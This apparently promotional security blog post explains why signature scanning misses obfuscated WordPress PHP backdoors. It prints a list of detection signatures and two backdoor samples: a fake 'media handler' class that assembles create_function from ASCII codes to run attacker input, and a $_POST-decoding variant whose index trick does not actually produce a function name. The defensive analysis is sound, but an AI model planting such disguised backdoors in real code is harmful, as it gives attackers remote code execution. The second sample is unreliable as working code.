How I Trained an AI to Catch What Signatures Can’t

In my last two posts I showed you the backdoors hiding on a “protected” site and what WordPress malware actually looks like when you open the file. Today I want to talk about something different, which is how I built a detection engine that does not work the way you think it does.

I’m going to skip the architecture, the model weights, and the feature extraction pipeline. What I will do is explain why the approach every major WordPress scanner uses has a foundational problem, and why that problem forced me to build something different.

The Signature Problem

Every major WordPress security plugin uses some version of pattern matching. They maintain a database of known malicious strings called signatures, and they scan your files looking for matches. A simplified version looks like this:

// Traditional signature matching (simplified)
$signatures = [
    'eval(base64_decode(',
    'eval(gzinflate(',
    'eval(str_rot13(',
    'preg_replace("/.*?/e"',
    'assert(base64_decode(',
    'file_put_contents($GLOBALS[',
];

foreach ($files as $file) {
    $content = file_get_contents($file);
    foreach ($signatures as $sig) {
        if (strpos($content, $sig) !== false) {
            flag_as_malicious($file, $sig);
        }
    }
}

This approach works until the moment it stops working. The real problem is the assumption underneath signatures rather than the signatures themselves. Signature matching assumes malware will contain recognizable strings, and modern PHP malware goes out of its way to contain none of them. You won’t find eval() or base64_decode() anywhere in it, and nothing else in the file will look suspicious to a string search either.

What Modern Malware Looks Like to a Signature Scanner

Here is a real-world backdoor pattern I’ve encountered. I’ve sanitized it, but the technique is active in the wild right now:

<?php
// WordPress Media Handler v3.2
class WP_Media_Processor {
    private $handlers = [];

    public function __construct() {
        $this->handlers = array_map(
            'chr',
            [99,114,101,97,116,101,95,102,117,110,99,116,105,111,110]
        );
    }

    public function process($input) {
        $fn = implode('', $this->handlers);
        return $fn('$x', $input)('');
    }
}

Run every signature scanner on the market against this file and you’ll get zero detections. None of the usual red-flag functions appear anywhere in the file. The class name looks legitimate, the comment claims it’s a media handler, and the variable names are boring on purpose.

The tell is in those integers in the array, which are ASCII codes. The sequence 99,114,101,97,116,101,95,102,117,110,99,116,105,111,110 spells create_function, and the process method assembles that function name character by character before calling it with attacker-supplied input. It’s full remote code execution, completely invisible to signatures, and it’s what’s running on production WordPress sites right now while Wordfence shows green checkmarks.

Why More Signatures Don’t Fix This

The natural response to seeing something like that is to add more signatures. You could add detection for array_map('chr', for numeric arrays followed by implode, or for classes with suspicious constructor patterns.

But attackers read changelogs too, and the moment a new signature ships the payload mutates.

Obfuscation tools generate millions of variants, so you end up playing whack-a-mole against an opponent who can change shape faster than you can swing.

Here is another variant of the same technique:

<?php
$_ = 'JHg9Ym' . 'FzZTY' . '0X2Rl' . 'Y29kZS' . 'gkX1BPU1RbJ2knXSk7';
$__ = str_split('edcoab_46teleqsy');
$___ = $__[4].$__[10].$__[7].$__[13].$__[4].$__[14];
@$___($_);

Same result, completely different pattern, and no overlapping strings with the first one. A signature that catches variant A doesn’t touch variant B, and the attacker can generate variants C through Z before lunch.

This is the fundamental problem: signatures are reactive. You can only detect what you’ve already seen, so every new payload gets a free pass until someone reports it, a researcher analyzes it, and a signature gets written, tested, and shipped to your site. That window is usually measured in weeks, sometimes in months, and on shared hosting with slow plugin update cycles it can stretch out to seasons.

A Different Way to See

I spent two years thinking about this problem before I wrote a single line of detection code.

Finding more malicious strings was never going to solve it, because the strings keep changing. The question I landed on was what malicious code actually does when it runs, regardless of how clean it looks sitting in a file on disk.

Legitimate WordPress code does predictable things: it queries databases, renders templates, and processes form inputs through known sanitization functions, following patterns that core has established over twenty years. Malicious code, no matter how cleverly obfuscated, has to eventually do something that legitimate code doesn’t. At some point it has to execute arbitrary input, write to files it shouldn’t touch, reach out to external servers, or reassemble itself from pieces at runtime.

Signature matching asks whether a string matches a known bad string. The engine I built asks a different question, and I can’t spell that question out here. The reason for the silence is practical: the moment I publish the detection methodology, every obfuscation toolkit in the PHP underworld adds a bypass for it within a week.

What I can tell you is that the engine doesn’t look for strings or maintain a list of bad patterns. It evaluates code the way a senior security researcher would, by understanding what the code does rather than what it says.

The Training Problem

Building this kind of detection requires training data, a lot of it. I needed a massive corpus of known-malicious PHP and an equally massive corpus of known-clean PHP, so the model could learn what legitimate WordPress code looks like in enough detail that anything anomalous would be obvious by contrast.

The clean corpus was straightforward to assemble: every version of WordPress core, every plugin in the wordpress.org repository, and every theme in the directory. Millions of files, all verified clean by the repository’s own review process.

The malicious corpus was harder. I sourced from every public malware database I could find, collected samples from client cleanups spanning years, crawled honeypots, and reverse-engineered obfuscation tools to generate synthetic variants of real attacks.

Training Corpus (approximate)
─────────────────────────────
Verified clean:    12.4M files
Malicious:         341,000+ samples
Hash database:     950,000+ verified entries
Obfuscation variants generated: ~2.1M

Then I built four dedicated detection engines, each specialized for a different threat surface. I’m not going to tell you what those four surfaces are. If you’ve read the Nova Scan documentation you already know, and if you haven’t, that’s by design.

What Happens in Practice

This is what signature matching sees when it scans a compromised site:

[Wordfence] Scan complete: 0 issues found ✓
[Sucuri] Site is clean ✓
[MalCare] No malware detected ✓

And this is what my engine sees on the same site:

[NDE] 3 threats detected
  ├── wp-content/db.php
  │   Confidence: 97.2%
  │   Classification: Remote Code Execution (stream wrapper)
  │   Technique: zip:// protocol handler loading encrypted payload
  │
  ├── wp-content/uploads/2024/03/.cache.php
  │   Confidence: 94.8%
  │   Classification: Persistent Backdoor (cron-based)
  │   Technique: wp_cron callback executing reconstructed function
  │
  └── wp-includes/class-wp-locale.php (MODIFIED)
      Confidence: 99.1%
      Hash mismatch: 12 lines injected at L847-858
      Classification: Cookie-activated RCE
      Technique: $_COOKIE value passed through variable function call

What’s changed between those two outputs is not the signature database. The engine behind the second scan doesn’t maintain a signature database at all. The detections came from evaluating what each file actually does when it runs.

The False Positive Problem

High detection rates are easy if you don’t care about false positives. Flag everything with eval() and you’ll catch most malware, but you’ll also catch a hundred legitimate plugins that use eval() for perfectly valid reasons. Several caching plugins use it, some template engines rely on it, and WordPress core itself uses it in specific contexts.

A 99% detection rate with a 5% false positive rate sounds impressive until you do the math on a site with 10,000 files.

That’s 500 files incorrectly flagged as malicious, and nobody is going to manually review 500 files. They’ll either ignore all the warnings or nuke their entire installation and start over. For detection to be useful at all, the false positive rate has to be near zero rather than merely low.

The training corpus matters most at this boundary. The engine has to understand that eval() in a caching plugin’s template renderer is normal, while eval() receiving data from $_POST through three layers of string manipulation is not. Identical function call, and the engine has to reach completely different verdicts depending on where the input is coming from.

I tested the engine against every default plugin bundle shipped by every major hosting provider, including Hostinger, SiteGround, Bluehost, GoDaddy, and Cloudways. A fresh WordPress install on Hostinger comes with about a dozen pre-installed plugins, and my engine had to look at every file in every one of those plugins and correctly identify them all as clean. That validation alone took months, and every time I adjusted the model to catch a new malware variant, I had to re-validate against the entire clean corpus to make sure I hadn’t introduced new false positives.

What I Can’t Tell You

I’m deliberately vague about the technical implementation, and the reason is practical. The moment the feature extraction pipeline gets published, attackers start optimizing their obfuscation specifically to evade it. Describing the classification boundaries leads to payloads crafted to sit just below the threshold, and releasing the model architecture invites adversarial networks trained specifically to bypass it.

Security through obscurity alone is weak, but obscurity as one layer in a defense-in-depth strategy is smart.

The engine’s effectiveness is tested publicly, because anyone can install Nova Scan and throw real malware at it, and the detection and false-positive rates are both verifiable by anyone who wants to run the tests. What’s not public is how the engine achieves those rates, for the same reason cryptographic algorithms are published but private keys aren’t. The mechanism can be evaluated, while the specific implementation details that would let an attacker craft a bypass stay private.

What Comes Next

Nova Scan is free, and not in the freemium sense where the useful features are locked behind a paywall. The full detection engine, all four NDE models, the two-mode firewall, brute-force protection, and community threat intelligence all ship in the free version, across unlimited sites, with no credit card asked for at any point.

I built it because I was tired of cleaning up after scanners that should have caught the threat months earlier. Every site I cleaned was running a security plugin, and every one of those plugins had missed the compromise for weeks before anyone noticed. If you’ve read this far, you’re probably the kind of person who has cleaned a few hacked sites yourself, and you know what that moment feels like when it hits you that the tool you trusted was looking for the wrong things entirely.

That’s why I built something that evaluates what code does instead of scanning for what it contains. The patterns keep changing, but the behavior is what actually has to happen for the malware to do anything, and that is what Nova Scan watches for.

~ SephX, Nova Heaven. Still cleaning up malware, still not charging you for the privilege of knowing about it.